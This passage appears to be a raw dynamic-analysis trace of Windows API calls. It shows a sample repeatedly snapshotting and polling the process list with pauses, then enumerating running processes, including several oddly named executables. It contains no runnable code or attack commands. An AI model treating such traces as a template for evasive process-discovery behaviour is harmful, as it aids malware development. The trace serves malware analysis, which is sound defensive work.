th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.330] Sleep (dwMilliseconds=0x64) [0190.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.340] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.385] Sleep (dwMilliseconds=0x64) [0190.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.399] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.446] Sleep (dwMilliseconds=0x64) [0190.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.457] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.504] Sleep (dwMilliseconds=0x64) [0190.506] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.516] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.563] Sleep (dwMilliseconds=0x64) [0190.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.576] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.622] Sleep (dwMilliseconds=0x64) [0190.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.633] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.677] Sleep (dwMilliseconds=0x64) [0190.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.689] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.737] Sleep (dwMilliseconds=0x64) [0190.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.748] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.792] Sleep (dwMilliseconds=0x64) [0190.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.803] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.915] Sleep (dwMilliseconds=0x64) [0190.916] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.925] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.972] Sleep (dwMilliseconds=0x64) [0190.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.985] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.054] Sleep (dwMilliseconds=0x64) [0191.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.070] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.117] Sleep (dwMilliseconds=0x64) [0191.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.128] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.174] Sleep (dwMilliseconds=0x64) [0191.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.185] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.229] Sleep (dwMilliseconds=0x64) [0191.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.240] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.286] Sleep (dwMilliseconds=0x64) [0191.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.298] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.342] Sleep (dwMilliseconds=0x64) [0191.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.353] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.397] Sleep (dwMilliseconds=0x64) [0191.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.528] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.586] Sleep (dwMilliseconds=0x64) [0191.588] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.596] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.677] Sleep (dwMilliseconds=0x64) [0191.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.690] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.735] Sleep (dwMilliseconds=0x64) [0191.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.747] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.795] Sleep (dwMilliseconds=0x64) [0191.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.805] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.858] Sleep (dwMilliseconds=0x64) [0191.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.902] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.961] Sleep (dwMilliseconds=0x64) [0191.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0191.976] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.039] Sleep (dwMilliseconds=0x64) [0192.041] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0192.052] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.144] Sleep (dwMilliseconds=0x64) [0192.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0192.155] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.209] Sleep (dwMilliseconds=0x64) [0192.211] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0192.231] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.233] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x81, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.235] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.237] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.238] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.239] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.241] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.242] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.243] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.245] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.246] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.249] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.251] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.252] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.254] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.256] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.258] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.259] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.261] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.262] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.263] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.265] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.266] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.268] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.269] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.271] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.272] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.273] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.275] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.277] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.278] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.280] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.281] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.283] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.287] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.289] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0192.291] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.292] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.293] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0192.295] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0192.297] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0192.298] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0192.300] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0192.302] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0192.303] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0192.305] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0192.306] Process32Next (in: hSnapshot=0x2424, 